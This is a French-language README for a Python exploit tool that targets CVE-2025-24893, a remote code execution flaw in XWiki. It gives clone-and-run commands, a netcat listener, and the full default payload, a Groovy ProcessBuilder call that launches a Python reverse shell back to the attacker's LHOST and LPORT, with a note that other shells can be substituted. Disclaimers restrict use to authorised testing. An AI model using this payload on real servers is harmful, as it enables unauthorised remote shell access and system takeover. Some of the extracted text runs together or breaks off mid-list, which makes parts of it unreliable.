
Exploit modifié pour CVE-2025-24893
Un simple script Python3 pour exploiter CVE-2025-24893, une vulnérabilité d'exécution de code à distance dans la plateforme XWiki, à l'aide d'une macro asynchrone basée sur Groovy et d'une charge utile de reverse shell configurable.
⚠️ AVERTISSEMENT : Cet outil est fourni uniquement à des fins éducatives et de tests autorisés. Toute utilisation non autorisée sur des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite de tester est illégale et contraire à l'éthique.
ProcessBuilder pour éviter les particularités de Runtime.execrequestspip install requests
Clonez ce dépôt :
git clone https://github.com/hackersonsteroids/cve-2025-24893.git
cd cve-2025-24893
./exploit.py <TARGET_DOMAIN> <LHOST> <LPORT>
<TARGET_DOMAIN>
L'hôte XWiki (par exemple wiki.example.local).
<LHOST>
L'adresse IP de votre machine d'attaque (là où votre listener est en écoute).
<LPORT>
Le port de votre listener (entier).
nc -lvnp 4444
./exploit.py wiki.vulnerable.local 10.0.0.5 4444
netcat pour obtenir un shell.Avant d'envoyer la charge utile, le script :
https://<TARGET_DOMAIN>http://<TARGET_DOMAIN> en repli si HTTPS échoueCela permet d'assurer la compatibilité avec les déploiements à protocoles mixtes.
Par défaut, le script utilise un one-liner Python3 :
new ProcessBuilder(
['/bin/bash','-c',
'python3 -c \'import socket,subprocess,os;'
's=socket.socket();s.connect(("LHOST",LPORT));'
'os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);'
'os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])\'']
).redirectErrorStream(true).start()
build_payload() si vous avez besoin d'un autre shell (par exemple Bash, Perl, PHP, etc.).Ce projet est distribué sous la licence MIT. Consultez le fichier LICENSE pour plus de détails.
Cet outil est conçu uniquement pour les évaluations de sécurité autorisées et à des fins éducatives. Les auteurs déclinent toute responsabilité en cas d'utilisation abusive. Obtenez toujours une autorisation explicite avant de tester tout système cible.